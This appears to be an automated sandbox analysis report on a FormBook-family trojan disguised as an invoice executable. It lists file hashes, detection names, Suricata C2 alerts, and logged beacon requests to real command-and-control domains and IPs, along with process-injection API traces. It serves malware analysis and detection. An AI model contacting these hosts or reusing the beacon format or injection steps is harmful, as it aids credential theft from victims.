Summary | ZeroBOX

INV.exe

UPX Malicious Library PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 28, 2023, 10:49 p.m. Jan. 28, 2023, 11:02 p.m.
Size 351.3KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 f5ba8cd2153faf89a84faceabd8c8a50
SHA256 d004812639335fc21774851e271241aaead5918a69f978e1aedb6b573b6cca1b
CRC32 D477F9EA
ssdeep 6144:zYa6TIDW7dny8QOUiUK66kWsXlIO+8EJkcln1e5bVaVZlJcG8U:zYKDWA8QOiK65yO+TJkcln1ApSZT9/
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 2.57.90.16:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 143.92.48.236:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 66.96.147.160:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 66.112.211.168:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 211.149.132.144:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 162.0.216.254:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 217.70.184.50:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49189 -> 199.59.243.222:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

Status: 1 Return: 1 Repeated: 0
section: .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq
request GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip
request POST http://www.actualabaule.com/gbhu/
request GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq
request POST http://www.govcintria.online/gbhu/
request GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq
request POST http://www.49138.net/gbhu/
request GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq
request POST http://www.dongshi88.com/gbhu/
request GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq
request POST http://www.adalexs.com/gbhu/
request GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq
request POST http://www.bobblehead8.com/gbhu/
request GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq
request POST http://www.bordain.website/gbhu/
request GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq
request POST http://www.defituesday.com/gbhu/
request GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq
request POST http://www.actualabaule.com/gbhu/
request POST http://www.govcintria.online/gbhu/
request POST http://www.49138.net/gbhu/
request POST http://www.dongshi88.com/gbhu/
request POST http://www.adalexs.com/gbhu/
request POST http://www.bobblehead8.com/gbhu/
request POST http://www.bordain.website/gbhu/
request POST http://www.defituesday.com/gbhu/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2128
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00470000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
Status: 1 Return: 0 Repeated: 0

NtAllocateVirtualMemory

process_identifier: 2128
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00480000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
Status: 1 Return: 0 Repeated: 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
Status: 1 Return: 0 Repeated: 0
file: C:\Users\test22\AppData\Local\Temp\nucctjtro.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
Status: 1 Return: 1 Repeated: 0
host: 104.21.76.77
Process injection: Process 2128 called NtSetContextThread to modify thread in remote process 2220
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4199136
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000e8
process_identifier: 2220
Status: 1 Return: 0 Repeated: 0
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.65205746
FireEye Generic.mg.f5ba8cd2153faf89
McAfee RDN/Generic.dx
Cylance Unsafe
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Redcap.e666870d
Cybereason malicious.2941bb
Arcabit Trojan.Generic.D3E2F5F2
Cyren W32/ABRisk.DRNF-3156
Symantec Packed.NSISPacker!g14
ESET-NOD32 a variant of Win32/Injector_AGen.QG
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.65205746
Avast Win32:InjectorX-gen [Trj]
Sophos Mal/Generic-S
F-Secure Trojan.TR/Redcap.iqtst
DrWeb Trojan.Loader.1278
VIPRE Trojan.GenericKD.65205746
McAfee-GW-Edition BehavesLike.Win32.Dropper.fc
Emsisoft Trojan.GenericKD.65205746 (B)
SentinelOne Static AI - Suspicious PE
Webroot W32.Trojan.GenKD
Google Detected
Avira TR/AD.GenShell.qwxpn
MAX malware (ai score=88)
Antiy-AVL Trojan/Win32.Formbook
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm HEUR:Trojan-Spy.Win32.Noon.gen
GData Trojan.GenericKD.65205746
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.NSISInject.R495658
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36212.fqW@aGhmtkei
ALYac Gen:Variant.Lazy.263633
Malwarebytes Trojan.Injector
TrendMicro-HouseCall TROJ_GEN.R002H0DAR23
Rising Trojan.Injector!8.C4 (TFE:5:4WZSEkuvkMG)
Ikarus Trojan.Inject
Fortinet W32/Injector_AGen.QG!tr
AVG Win32:InjectorX-gen [Trj]
Panda Trj/GdSda.A